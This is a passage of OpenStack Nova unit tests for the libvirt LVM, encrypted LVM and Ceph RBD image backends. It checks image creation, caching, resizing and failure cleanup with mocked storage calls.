class LvmTestCase(_ImageTestCase, test.NoDBTestCase):
VG = 'FakeVG'
TEMPLATE_SIZE = 512
SIZE = 1024
def setUp(self):
self.image_class = imagebackend.Lvm
super(LvmTestCase, self).setUp()
self.flags(images_volume_group=self.VG, group='libvirt')
self.flags(enabled=False, group='ephemeral_storage_encryption')
self.INSTANCE['ephemeral_key_uuid'] = None
self.LV = '%s_%s' % (self.INSTANCE['uuid'], self.NAME)
self.PATH = os.path.join('/dev', self.VG, self.LV)
@mock.patch.object(compute_utils, 'disk_ops_semaphore')
@mock.patch('nova.privsep.utils.supports_direct_io', return_value=True)
@mock.patch.object(imagebackend.lvm, 'create_volume')
@mock.patch.object(imagebackend.disk, 'get_disk_size',
return_value=TEMPLATE_SIZE)
@mock.patch('nova.privsep.qemu.convert_image')
def _create_image(self, sparse, mock_convert_image, mock_get, mock_create,
mock_ignored, mock_disk_op_sema):
fn = mock.MagicMock()
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH, None)
mock_create.assert_called_once_with(self.VG, self.LV,
self.TEMPLATE_SIZE,
sparse=sparse)
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
mock_get.assert_called_once_with(self.TEMPLATE_PATH)
path = '/dev/%s/%s_%s' % (self.VG, self.INSTANCE.uuid, self.NAME)
mock_convert_image.assert_called_once_with(
self.TEMPLATE_PATH, path, None, 'raw', CONF.instances_path, False)
mock_disk_op_sema.__enter__.assert_called_once()
@mock.patch.object(imagebackend.lvm, 'create_volume')
def _create_image_generated(self, sparse, mock_create):
fn = mock.MagicMock()
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH,
self.SIZE, ephemeral_size=None)
mock_create.assert_called_once_with(self.VG, self.LV,
self.SIZE, sparse=sparse)
fn.assert_called_once_with(target=self.PATH, ephemeral_size=None)
@mock.patch.object(compute_utils, 'disk_ops_semaphore')
@mock.patch('nova.privsep.utils.supports_direct_io', return_value=True)
@mock.patch.object(imagebackend.disk, 'resize2fs')
@mock.patch.object(imagebackend.lvm, 'create_volume')
@mock.patch.object(imagebackend.disk, 'get_disk_size',
return_value=TEMPLATE_SIZE)
@mock.patch('nova.privsep.qemu.convert_image')
def _create_image_resize(self, sparse, mock_convert_image, mock_get,
mock_create, mock_resize, mock_ignored,
mock_disk_op_sema):
fn = mock.MagicMock()
fn(target=self.TEMPLATE_PATH)
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH, self.SIZE)
mock_create.assert_called_once_with(self.VG, self.LV,
self.SIZE, sparse=sparse)
mock_get.assert_called_once_with(self.TEMPLATE_PATH)
mock_convert_image.assert_called_once_with(
self.TEMPLATE_PATH, self.PATH, None, 'raw',
CONF.instances_path, False)
mock_disk_op_sema.__enter__.assert_called_once()
mock_resize.assert_called_once_with(self.PATH, run_as_root=True)
@mock.patch.object(imagebackend.fileutils, 'ensure_tree')
@mock.patch.object(os.path, 'exists')
def test_cache(self, mock_exists, mock_ensure):
mock_exists.side_effect = [False, False, False]
exist_calls = [mock.call(self.TEMPLATE_DIR),
mock.call(self.PATH),
mock.call(self.TEMPLATE_PATH)]
fn = mock.MagicMock()
image = self.image_class(self.INSTANCE, self.NAME)
self.mock_create_image(image)
image.cache(fn, self.TEMPLATE)
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
mock_ensure.assert_called_once_with(self.TEMPLATE_DIR)
mock_exists.assert_has_calls(exist_calls)
@mock.patch.object(os.path, 'exists')
def test_cache_image_exists(self, mock_exists):
mock_exists.side_effect = [True, True, True]
exist_calls = [mock.call(self.TEMPLATE_DIR),
mock.call(self.PATH),
mock.call(self.TEMPLATE_PATH)]
image = self.image_class(self.INSTANCE, self.NAME)
image.cache(None, self.TEMPLATE)
mock_exists.assert_has_calls(exist_calls)
@mock.patch.object(imagebackend.fileutils, 'ensure_tree')
@mock.patch.object(os.path, 'exists', side_effect=[True, False, False])
def test_cache_base_dir_exists(self, mock_exists, mock_ensure):
exist_calls = [mock.call(self.TEMPLATE_DIR),
mock.call(self.PATH),
mock.call(self.TEMPLATE_PATH)]
fn = mock.MagicMock()
image = self.image_class(self.INSTANCE, self.NAME)
self.mock_create_image(image)
image.cache(fn, self.TEMPLATE)
mock_exists.assert_has_calls(exist_calls)
mock_ensure.assert_not_called()
@mock.patch('os.path.exists', autospec=True)
@mock.patch('nova.utils.synchronized', autospec=True)
@mock.patch.object(imagebackend, 'lvm', autospec=True)
@mock.patch.object(imagebackend.fileutils, 'ensure_tree', autospec=True)
def test_cache_ephemeral(self, mock_ensure, mock_lvm, mock_synchronized,
mock_exists):
# Ignores its arguments and returns the wrapped function unmodified
def fake_synchronized(*args, **kwargs):
def outer(fn):
def wrapper(*wargs, **wkwargs):
fn(*wargs, **wkwargs)
return wrapper
return outer
mock_synchronized.side_effect = fake_synchronized
# Fake exists returns true for paths which have been added to the
# exists set
exists = set()
def fake_exists(path):
return path in exists
mock_exists.side_effect = fake_exists
# Fake create_volume causes exists to return true for the volume
def fake_create_volume(vg, lv, size, sparse=False):
exists.add(os.path.join('/dev', vg, lv))
mock_lvm.create_volume.side_effect = fake_create_volume
# Assert that when we call cache() for an ephemeral disk with the
# Lvm backend, we call fetch_func with a target of the Lvm disk
size_gb = 1
size = size_gb * units.Gi
fetch_func = mock.MagicMock()
image = self.image_class(self.INSTANCE, self.NAME)
image.cache(fetch_func, self.TEMPLATE,
ephemeral_size=size_gb, size=size)
mock_ensure.assert_called_once_with(self.TEMPLATE_DIR)
mock_lvm.create_volume.assert_called_once_with(self.VG, self.LV, size,
sparse=False)
fetch_func.assert_called_once_with(target=self.PATH,
ephemeral_size=size_gb)
mock_synchronized.assert_called()
def test_create_image(self):
self._create_image(False)
def test_create_image_sparsed(self):
self.flags(sparse_logical_volumes=True, group='libvirt')
self._create_image(True)
def test_create_image_generated(self):
self._create_image_generated(False)
def test_create_image_generated_sparsed(self):
self.flags(sparse_logical_volumes=True, group='libvirt')
self._create_image_generated(True)
def test_create_image_resize(self):
self._create_image_resize(False)
def test_create_image_resize_sparsed(self):
self.flags(sparse_logical_volumes=True, group='libvirt')
self._create_image_resize(True)
@mock.patch.object(imagebackend.lvm, 'create_volume',
side_effect=RuntimeError)
@mock.patch.object(imagebackend.disk, 'get_disk_size',
return_value=TEMPLATE_SIZE)
@mock.patch.object(imagebackend.lvm, 'remove_volumes')
def test_create_image_negative(self, mock_remove, mock_get, mock_create):
fn = mock.MagicMock()
image = self.image_class(self.INSTANCE, self.NAME)
self.assertRaises(RuntimeError, image.create_image, fn,
self.TEMPLATE_PATH, self.SIZE)
mock_create.assert_called_once_with(self.VG, self.LV,
self.SIZE, sparse=False)
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
mock_get.assert_called_once_with(self.TEMPLATE_PATH)
mock_remove.assert_called_once_with([self.PATH])
@mock.patch.object(imagebackend.lvm, 'create_volume')
@mock.patch.object(imagebackend.lvm, 'remove_volumes')
def test_create_image_generated_negative(self, mock_remove, mock_create):
fn = mock.MagicMock()
fn.side_effect = RuntimeError
image = self.image_class(self.INSTANCE, self.NAME)
self.assertRaises(RuntimeError, image.create_image, fn,
self.TEMPLATE_PATH, self.SIZE,
ephemeral_size=None)
mock_create.assert_called_once_with(self.VG, self.LV, self.SIZE,
sparse=False)
fn.assert_called_once_with(target=self.PATH, ephemeral_size=None)
mock_remove.assert_called_once_with([self.PATH])
def test_prealloc_image(self):
CONF.set_override('preallocate_images', 'space')
fake_processutils.fake_execute_clear_log()
fake_processutils.stub_out_processutils_execute(self)
image = self.image_class(self.INSTANCE, self.NAME)
def fake_fetch(target, *args, **kwargs):
return
self.stub_out('os.path.exists', lambda _: True)
self.stub_out('nova.virt.libvirt.imagebackend.Lvm.exists',
lambda *a, **kw: True)
self.stub_out('nova.virt.libvirt.imagebackend.Lvm.get_disk_size',
lambda *a, **kw: self.SIZE)
image.cache(fake_fetch, self.TEMPLATE_PATH, self.SIZE)
self.assertEqual(fake_processutils.fake_execute_get_log(), [])
class EncryptedLvmTestCase(_ImageTestCase, test.NoDBTestCase):
VG = 'FakeVG'
TEMPLATE_SIZE = 512
SIZE = 1024
def setUp(self):
self.image_class = imagebackend.Lvm
super(EncryptedLvmTestCase, self).setUp()
self.flags(enabled=True, group='ephemeral_storage_encryption')
self.flags(cipher='aes-xts-plain64',
group='ephemeral_storage_encryption')
self.flags(key_size=512, group='ephemeral_storage_encryption')
self.flags(fixed_key='00000000000000000000000000000000'
'00000000000000000000000000000000',
group='key_manager')
self.flags(images_volume_group=self.VG, group='libvirt')
self.LV = '%s_%s' % (self.INSTANCE['uuid'], self.NAME)
self.LV_PATH = os.path.join('/dev', self.VG, self.LV)
self.PATH = os.path.join('/dev/mapper',
imagebackend.dmcrypt.volume_name(self.LV))
self.key_manager = key_manager.API()
self.INSTANCE['ephemeral_key_uuid'] =\
self.key_manager.create_key(self.CONTEXT, 'AES', 256)
self.KEY = self.key_manager.get(self.CONTEXT,
self.INSTANCE['ephemeral_key_uuid']).get_encoded()
self.lvm = imagebackend.lvm
self.disk = imagebackend.disk
self.utils = imagebackend.utils
self.libvirt_utils = imagebackend.libvirt_utils
self.dmcrypt = imagebackend.dmcrypt
def _create_image(self, sparse):
with test.nested(
mock.patch('nova.privsep.utils.supports_direct_io',
return_value=True),
mock.patch.object(self.lvm, 'create_volume', mock.Mock()),
mock.patch.object(self.lvm, 'remove_volumes', mock.Mock()),
mock.patch.object(self.disk, 'resize2fs', mock.Mock()),
mock.patch.object(self.disk, 'get_disk_size',
mock.Mock(return_value=self.TEMPLATE_SIZE)),
mock.patch.object(self.dmcrypt, 'create_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'delete_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'list_volumes', mock.Mock()),
mock.patch('nova.privsep.qemu.convert_image'),
mock.patch.object(compute_utils, 'disk_ops_semaphore')):
fn = mock.Mock()
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH, self.TEMPLATE_SIZE,
context=self.CONTEXT)
compute_utils.disk_ops_semaphore.__enter__.assert_called_once()
fn.assert_called_with(context=self.CONTEXT,
target=self.TEMPLATE_PATH)
self.lvm.create_volume.assert_called_with(self.VG,
self.LV,
self.TEMPLATE_SIZE,
sparse=sparse)
self.dmcrypt.create_volume.assert_called_with(
self.PATH.rpartition('/')[2],
self.LV_PATH,
CONF.ephemeral_storage_encryption.cipher,
CONF.ephemeral_storage_encryption.key_size,
self.KEY)
nova.privsep.qemu.convert_image.assert_called_with(
self.TEMPLATE_PATH, self.PATH, None, 'raw',
CONF.instances_path, False)
def _create_image_generated(self, sparse):
with test.nested(
mock.patch.object(self.lvm, 'create_volume', mock.Mock()),
mock.patch.object(self.lvm, 'remove_volumes', mock.Mock()),
mock.patch.object(self.disk, 'resize2fs', mock.Mock()),
mock.patch.object(self.disk, 'get_disk_size',
mock.Mock(return_value=self.TEMPLATE_SIZE)),
mock.patch.object(self.dmcrypt, 'create_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'delete_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'list_volumes', mock.Mock()),
mock.patch('nova.privsep.qemu.convert_image')):
fn = mock.Mock()
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH,
self.SIZE,
ephemeral_size=None,
context=self.CONTEXT)
self.lvm.create_volume.assert_called_with(
self.VG,
self.LV,
self.SIZE,
sparse=sparse)
self.dmcrypt.create_volume.assert_called_with(
self.PATH.rpartition('/')[2],
self.LV_PATH,
CONF.ephemeral_storage_encryption.cipher,
CONF.ephemeral_storage_encryption.key_size,
self.KEY)
fn.assert_called_with(target=self.PATH,
ephemeral_size=None, context=self.CONTEXT)
def _create_image_resize(self, sparse):
with test.nested(
mock.patch('nova.privsep.utils.supports_direct_io',
return_value=True),
mock.patch.object(self.lvm, 'create_volume', mock.Mock()),
mock.patch.object(self.lvm, 'remove_volumes', mock.Mock()),
mock.patch.object(self.disk, 'resize2fs', mock.Mock()),
mock.patch.object(self.disk, 'get_disk_size',
mock.Mock(return_value=self.TEMPLATE_SIZE)),
mock.patch.object(self.dmcrypt, 'create_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'delete_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'list_volumes', mock.Mock()),
mock.patch('nova.privsep.qemu.convert_image'),
mock.patch.object(compute_utils, 'disk_ops_semaphore')):
fn = mock.Mock()
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH, self.SIZE,
context=self.CONTEXT)
compute_utils.disk_ops_semaphore.__enter__.assert_called_once()
fn.assert_called_with(context=self.CONTEXT,
target=self.TEMPLATE_PATH)
self.disk.get_disk_size.assert_called_with(self.TEMPLATE_PATH)
self.lvm.create_volume.assert_called_with(
self.VG,
self.LV,
self.SIZE,
sparse=sparse)
self.dmcrypt.create_volume.assert_called_with(
self.PATH.rpartition('/')[2],
self.LV_PATH,
CONF.ephemeral_storage_encryption.cipher,
CONF.ephemeral_storage_encryption.key_size,
self.KEY)
nova.privsep.qemu.convert_image.assert_called_with(
self.TEMPLATE_PATH, self.PATH, None, 'raw',
CONF.instances_path, False)
self.disk.resize2fs.assert_called_with(self.PATH, run_as_root=True)
def test_create_image(self):
self._create_image(False)
def test_create_image_sparsed(self):
self.flags(sparse_logical_volumes=True, group='libvirt')
self._create_image(True)
def test_create_image_generated(self):
self._create_image_generated(False)
def test_create_image_generated_sparsed(self):
self.flags(sparse_logical_volumes=True, group='libvirt')
self._create_image_generated(True)
def test_create_image_resize(self):
self._create_image_resize(False)
def test_create_image_resize_sparsed(self):
self.flags(sparse_logical_volumes=True, group='libvirt')
self._create_image_resize(True)
def test_create_image_negative(self):
with test.nested(
mock.patch.object(self.lvm, 'create_volume', mock.Mock()),
mock.patch.object(self.lvm, 'remove_volumes', mock.Mock()),
mock.patch.object(self.disk, 'resize2fs', mock.Mock()),
mock.patch.object(self.disk, 'get_disk_size',
mock.Mock(return_value=self.TEMPLATE_SIZE)),
mock.patch.object(self.dmcrypt, 'create_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'delete_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'list_volumes', mock.Mock()),
mock.patch('oslo_concurrency.processutils.execute',
mock.Mock())):
fn = mock.Mock()
self.lvm.create_volume.side_effect = RuntimeError()
image = self.image_class(self.INSTANCE, self.NAME)
self.assertRaises(
RuntimeError,
image.create_image,
fn,
self.TEMPLATE_PATH,
self.SIZE,
context=self.CONTEXT)
fn.assert_called_with(
context=self.CONTEXT,
target=self.TEMPLATE_PATH)
self.disk.get_disk_size.assert_called_with(
self.TEMPLATE_PATH)
self.lvm.create_volume.assert_called_with(
self.VG,
self.LV,
self.SIZE,
sparse=False)
self.dmcrypt.delete_volume.assert_called_with(
self.PATH.rpartition('/')[2])
self.lvm.remove_volumes.assert_called_with([self.LV_PATH])
def test_create_image_encrypt_negative(self):
with test.nested(
mock.patch.object(self.lvm, 'create_volume', mock.Mock()),
mock.patch.object(self.lvm, 'remove_volumes', mock.Mock()),
mock.patch.object(self.disk, 'resize2fs', mock.Mock()),
mock.patch.object(self.disk, 'get_disk_size',
mock.Mock(return_value=self.TEMPLATE_SIZE)),
mock.patch.object(self.dmcrypt, 'create_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'delete_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'list_volumes', mock.Mock()),
mock.patch('oslo_concurrency.processutils.execute',
mock.Mock())):
fn = mock.Mock()
self.dmcrypt.create_volume.side_effect = RuntimeError()
image = self.image_class(self.INSTANCE, self.NAME)
self.assertRaises(
RuntimeError,
image.create_image,
fn,
self.TEMPLATE_PATH,
self.SIZE,
context=self.CONTEXT)
fn.assert_called_with(
context=self.CONTEXT,
target=self.TEMPLATE_PATH)
self.disk.get_disk_size.assert_called_with(self.TEMPLATE_PATH)
self.lvm.create_volume.assert_called_with(
self.VG,
self.LV,
self.SIZE,
sparse=False)
self.dmcrypt.create_volume.assert_called_with(
self.dmcrypt.volume_name(self.LV),
self.LV_PATH,
CONF.ephemeral_storage_encryption.cipher,
CONF.ephemeral_storage_encryption.key_size,
self.KEY)
self.dmcrypt.delete_volume.assert_called_with(
self.PATH.rpartition('/')[2])
self.lvm.remove_volumes.assert_called_with([self.LV_PATH])
def test_create_image_generated_negative(self):
with test.nested(
mock.patch.object(self.lvm, 'create_volume', mock.Mock()),
mock.patch.object(self.lvm, 'remove_volumes', mock.Mock()),
mock.patch.object(self.disk, 'resize2fs', mock.Mock()),
mock.patch.object(self.disk, 'get_disk_size',
mock.Mock(return_value=self.TEMPLATE_SIZE)),
mock.patch.object(self.dmcrypt, 'create_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'delete_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'list_volumes', mock.Mock()),
mock.patch('oslo_concurrency.processutils.execute',
mock.Mock())):
fn = mock.Mock()
fn.side_effect = RuntimeError()
image = self.image_class(self.INSTANCE, self.NAME)
self.assertRaises(RuntimeError,
image.create_image,
fn,
self.TEMPLATE_PATH,
self.SIZE,
ephemeral_size=None,
context=self.CONTEXT)
self.lvm.create_volume.assert_called_with(
self.VG,
self.LV,
self.SIZE,
sparse=False)
self.dmcrypt.create_volume.assert_called_with(
self.PATH.rpartition('/')[2],
self.LV_PATH,
CONF.ephemeral_storage_encryption.cipher,
CONF.ephemeral_storage_encryption.key_size,
self.KEY)
fn.assert_called_with(
target=self.PATH,
ephemeral_size=None,
context=self.CONTEXT)
self.dmcrypt.delete_volume.assert_called_with(
self.PATH.rpartition('/')[2])
self.lvm.remove_volumes.assert_called_with([self.LV_PATH])
def test_create_image_generated_encrypt_negative(self):
with test.nested(
mock.patch.object(self.lvm, 'create_volume', mock.Mock()),
mock.patch.object(self.lvm, 'remove_volumes', mock.Mock()),
mock.patch.object(self.disk, 'resize2fs', mock.Mock()),
mock.patch.object(self.disk, 'get_disk_size',
mock.Mock(return_value=self.TEMPLATE_SIZE)),
mock.patch.object(self.dmcrypt, 'create_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'delete_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'list_volumes', mock.Mock()),
mock.patch('oslo_concurrency.processutils.execute',
mock.Mock())):
fn = mock.Mock()
fn.side_effect = RuntimeError()
image = self.image_class(self.INSTANCE, self.NAME)
self.assertRaises(
RuntimeError,
image.create_image,
fn,
self.TEMPLATE_PATH,
self.SIZE,
ephemeral_size=None,
context=self.CONTEXT)
self.lvm.create_volume.assert_called_with(
self.VG,
self.LV,
self.SIZE,
sparse=False)
self.dmcrypt.create_volume.assert_called_with(
self.PATH.rpartition('/')[2],
self.LV_PATH,
CONF.ephemeral_storage_encryption.cipher,
CONF.ephemeral_storage_encryption.key_size,
self.KEY)
self.dmcrypt.delete_volume.assert_called_with(
self.PATH.rpartition('/')[2])
self.lvm.remove_volumes.assert_called_with([self.LV_PATH])
def test_prealloc_image(self):
self.flags(preallocate_images='space')
fake_processutils.fake_execute_clear_log()
fake_processutils.stub_out_processutils_execute(self)
image = self.image_class(self.INSTANCE, self.NAME)
def fake_fetch(target, *args, **kwargs):
return
self.stub_out('os.path.exists', lambda _: True)
self.stub_out('nova.virt.libvirt.imagebackend.Lvm.exists',
lambda *a, **kw: True)
self.stub_out('nova.virt.libvirt.imagebackend.Lvm.get_disk_size',
lambda *a, **kw: self.SIZE)
image.cache(fake_fetch, self.TEMPLATE_PATH, self.SIZE)
self.assertEqual(fake_processutils.fake_execute_get_log(), [])
def test_get_model(self):
image = self.image_class(self.INSTANCE, self.NAME)
model = image.get_model(FakeConn())
self.assertEqual(imgmodel.LocalBlockImage(self.PATH),
model)
@ddt.ddt
class RbdTestCase(_ImageTestCase, test.NoDBTestCase):
FSID = "FakeFsID"
POOL = "FakePool"
USER = "FakeUser"
CONF = "FakeConf"
SIZE = 1024
def setUp(self):
self.image_class = imagebackend.Rbd
super(RbdTestCase, self).setUp()
self.flags(images_rbd_pool=self.POOL,
rbd_user=self.USER,
images_rbd_ceph_conf=self.CONF,
group='libvirt')
self.libvirt_utils = imagebackend.libvirt_utils
self.utils = imagebackend.utils
# mock out the ceph clients to avoid an ImportError
rbd_utils.rbd = mock.Mock()
rbd_utils.rados = mock.Mock()
@mock.patch.object(os.path, 'exists', return_value=False)
@mock.patch.object(imagebackend.Rbd, 'exists', return_value=False)
@mock.patch.object(imagebackend.fileutils, 'ensure_tree')
def test_cache(self, mock_ensure, mock_img_exist, mock_os_exist):
image = self.image_class(self.INSTANCE, self.NAME)
fn = mock.MagicMock()
self.mock_create_image(image)
image.cache(fn, self.TEMPLATE)
mock_ensure.assert_called_once_with(self.TEMPLATE_DIR)
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
mock_img_exist.assert_called_with()
mock_os_exist.assert_has_calls([
mock.call(self.TEMPLATE_DIR), mock.call(self.TEMPLATE_PATH)
])
@mock.patch.object(os.path, 'exists')
@mock.patch.object(imagebackend.Rbd, 'exists')
@mock.patch.object(imagebackend.fileutils, 'ensure_tree')
def test_cache_base_dir_exists(self, mock_ensure,
mock_img_exist, mock_os_exist):
mock_os_exist.side_effect = [True, False]
mock_img_exist.return_value = False
image = self.image_class(self.INSTANCE, self.NAME)
fn = mock.MagicMock()
self.mock_create_image(image)
image.cache(fn, self.TEMPLATE)
mock_img_exist.assert_called_once_with()
mock_os_exist.assert_has_calls([
mock.call(self.TEMPLATE_DIR), mock.call(self.TEMPLATE_PATH)
])
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
@mock.patch.object(os.path, 'exists', return_value=True)
@mock.patch.object(imagebackend.Rbd, 'exists', return_value=True)
def test_cache_image_exists(self, mock_img_exist, mock_os_exist):
image = self.image_class(self.INSTANCE, self.NAME)
image.cache(None, self.TEMPLATE)
mock_img_exist.assert_called_once_with()
mock_os_exist.assert_has_calls([
mock.call(self.TEMPLATE_DIR), mock.call(self.TEMPLATE_PATH)
])
@mock.patch.object(os.path, 'exists')
@mock.patch.object(imagebackend.Rbd, 'exists')
def test_cache_template_exists(self, mock_img_exist, mock_os_exist):
mock_os_exist.return_value = True
mock_img_exist.return_value = False
image = self.image_class(self.INSTANCE, self.NAME)
self.mock_create_image(image)
image.cache(None, self.TEMPLATE)
mock_img_exist.assert_called_once_with()
mock_os_exist.assert_has_calls([
mock.call(self.TEMPLATE_DIR), mock.call(self.TEMPLATE_PATH)
])
@mock.patch.object(imagebackend.Rbd, 'exists')
def test_create_image(self, mock_exists):
fn = mock.MagicMock()
rbd_utils.rbd.RBD_FEATURE_LAYERING = 1
fake_processutils.fake_execute_clear_log()
fake_processutils.stub_out_processutils_execute(self)
image = self.image_class(self.INSTANCE, self.NAME)
mock_exists.return_value = False
image.create_image(fn, self.TEMPLATE_PATH, None)
rbd_name = "%s_%s" % (self.INSTANCE['uuid'], self.NAME)
cmd = ('rbd', 'import', '--pool', self.POOL, self.TEMPLATE_PATH,
rbd_name, '--image-format=2', '--id', self.USER,
'--conf', self.CONF)
self.assertEqual(fake_processutils.fake_execute_get_log(),
[' '.join(cmd)])
mock_exists.assert_has_calls([mock.call(), mock.call()])
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
@mock.patch.object(images, 'qemu_img_info')
@mock.patch.object(os.path, 'exists', return_value=False)
def test__remove_non_raw_cache_image_not_exists(
self, mock_exists, mock_qemu):
image = self.image_class(self.INSTANCE, self.NAME)
image._remove_non_raw_cache_image(self.TEMPLATE_PATH)
mock_qemu.assert_not_called()
@mock.patch.object(os, 'remove')
@mock.patch.object(images, 'qemu_img_info',
return_value=imageutils.QemuImgInfo())
@mock.patch.object(os.path, 'exists', return_value=True)
def test__remove_non_raw_cache_image_with_raw_cache(
self, mock_exists, mock_qemu, mock_remove):
mock_qemu.return_value.file_format = 'raw'
image = self.image_class(self.INSTANCE, self.NAME)
image._remove_non_raw_cache_image(self.TEMPLATE_PATH)
mock_remove.assert_not_called()
@mock.patch.object(os, 'remove')
@mock.patch.object(images, 'qemu_img_info',
return_value=imageutils.QemuImgInfo())
@mock.patch.object(os.path, 'exists', return_value=True)
def test__remove_non_raw_cache_image_with_qcow2_cache(
self, mock_exists, mock_qemu, mock_remove):
mock_qemu.return_value.file_format = 'qcow2'
image = self.image_class(self.INSTANCE, self.NAME)
image._remove_non_raw_cache_image(self.TEMPLATE_PATH)
mock_remove.assert_called_once_with(self.TEMPLATE_PATH)
@mock.patch.object(images, 'qemu_img_info',
return_value=imageutils.QemuImgInfo())
@mock.patch.object(rbd_utils.RBDDriver, 'resize')
@mock.patch.object(imagebackend.Rbd, 'verify_base_size')
@mock.patch.object(imagebackend.Rbd, 'get_disk_size')
@mock.patch.object(imagebackend.Rbd, 'exists')
def test_create_image_resize(self, mock_exists, mock_get,
mock_verify, mock_resize, mock_qemu):
fn = mock.MagicMock()
full_size = self.SIZE * 2
rbd_utils.rbd.RBD_FEATURE_LAYERING = 1
fake_processutils.fake_execute_clear_log()
fake_processutils.stub_out_processutils_execute(self)
image = self.image_class(self.INSTANCE, self.NAME)
mock_exists.return_value = False
mock_qemu.return_value.file_format = 'raw'
mock_get.return_value = self.SIZE
rbd_name = "%s_%s" % (self.INSTANCE['uuid'], self.NAME)
cmd = ('rbd', 'import', '--pool', self.POOL, self.TEMPLATE_PATH,
rbd_name, '--image-format=2', '--id', self.USER,
'--conf', self.CONF)
image.create_image(fn, self.TEMPLATE_PATH, full_size)
self.assertEqual(fake_processutils.fake_execute_get_log(),
[' '.join(cmd)])
mock_exists.assert_has_calls([mock.call(), mock.call()])
mock_get.assert_called_once_with(rbd_name)
mock_resize.assert_called_once_with(rbd_name, full_size)
mock_verify.assert_called_once_with(self.TEMPLATE_PATH, full_size)
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
@mock.patch.object(images, 'qemu_img_info',
return_value=imageutils.QemuImgInfo())
@mock.patch.object(imagebackend.Rbd, 'get_disk_size')
@mock.patch.object(imagebackend.Rbd, 'exists')
def test_create_image_already_exists(self, mock_exists, mock_get,
mock_qemu):
rbd_utils.rbd.RBD_FEATURE_LAYERING = 1
image = self.image_class(self.INSTANCE, self.NAME)
mock_exists.return_value = True
mock_qemu.return_value.file_format = 'raw'
mock_get.return_value = self.SIZE
rbd_name = "%s_%s" % (self.INSTANCE['uuid'], self.NAME)
fn = mock.MagicMock()
image.create_image(fn, self.TEMPLATE_PATH, self.SIZE)
mock_exists.assert_has_calls([mock.call(), mock.call()])
mock_get.assert_has_calls([mock.call(self.TEMPLATE_PATH),
mock.call(rbd_name)])
def test_prealloc_image(self):
CONF.set_override('preallocate_images', 'space')
fake_processutils.fake_execute_clear_log()
fake_processutils.stub_out_processutils_execute(self)
image = self.image_class(self.INSTANCE, self.NAME)
def fake_fetch(target, *args, **kwargs):
return
self.stub_out('os.path.exists', lambda _: True)
self.stub_out('nova.virt.libvirt.imagebackend.Rbd.exists',
lambda *a, **kw: True)
self.stub_out('nova.virt.libvirt.imagebackend.Rbd.get_disk_size',
lambda *a, **kw: self.SIZE)
image.cache(fake_fetch, self.TEMPLATE_PATH, self.SIZE)
self.assertEqual(fake_processutils.fake_execute_get_log(), [])
def test_parent_compatible(self):
self.assertEqual(utils.getargspec(imagebackend.Image.libvirt_info),
utils.getargspec(self.image_class.libvirt_info))
def test_image_path(self):
conf = "FakeConf"
pool = "FakePool"
user = "FakeUser"
self.flags(images_rbd_pool=pool, group='libvirt')
self.flags(images_rbd_ceph_conf=conf, group='libvirt')
self.flags(rbd_user=user, group='libvirt')
image = self.image_class(self.INSTANCE, self.NAME)
rbd_path = "rbd:%s/%s:id=%s:conf=%s" % (pool, image.rbd_name,
user, conf)
self.assertEqual(image.path, rbd_path)
def test_get_disk_size(self):
image = self.image_class(self.INSTANCE, self.NAME)
with mock.patch.object(image.driver, 'size') as size_mock:
size_mock.return_value = 2361393152
self.assertEqual(2361393152, image.get_disk_size(image.path))
size_mock.assert_called_once_with(image.rbd_name)
@mock.patch.object(images, 'qemu_img_info',
return_value=imageutils.QemuImgInfo())
def test_create_image_too_small(self, mock_qemu):
mock_qemu.return_value.file_format = 'raw'
image = self.image_class(self.INSTANCE, self.NAME)
with mock.patch.object(image, 'driver') as driver_mock:
driver_mock.exists.return_value = True
driver_mock.size.return_value = 2
self.assertRaises(exception.FlavorDiskSmallerThanImage,
image.create_image, mock.MagicMock(),
self.TEMPLATE_PATH, 1)
driver_mock.size.assert_called_once_with(image.rbd_name)
@mock.patch.object(rbd_utils.RBDDriver, "get_mon_addrs")
def test_libvirt_info(self, mock_mon_addrs):
def get_mon_addrs():
hosts = ["server1", "server2"]
ports = ["1899", "1920"]
return hosts, ports
mock_mon_addrs.side_effect = get_mon_addrs
super(RbdTestCase, self).test_libvirt_info()
@ddt.data(5, None)
@mock.patch.object(rbd_utils.RBDDriver, "get_mon_addrs")
def test_libvirt_info_scsi_with_unit(self, disk_unit, mock_mon_addrs):
def get_mon_addrs():
hosts = ["server1", "server2"]
ports = ["1899", "1920"]
return hosts, ports
mock_mon_addrs.side_effect = get_mon_addrs
super(RbdTestCase, self)._test_libvirt_info_scsi_with_unit(disk_unit)
@mock.patch.object(rbd_utils.RBDDriver, "get_mon_addrs")
def test_get_model(self, mock_mon_addrs):
pool = "FakePool"
user = "FakeUser"
self.flags(images_rbd_pool=pool, group='libvirt')
self.flags(rbd_user=user, group='libvirt')
self.flags(rbd_secret_uuid="3306a5c4-8378-4b3c-aa1f-7b48d3a26172",
group='libvirt')
# image.get_model() should always pass strip_brackets=False
# for building proper IPv6 address+ports for libguestfs
def get_mon_addrs(strip_brackets=True):
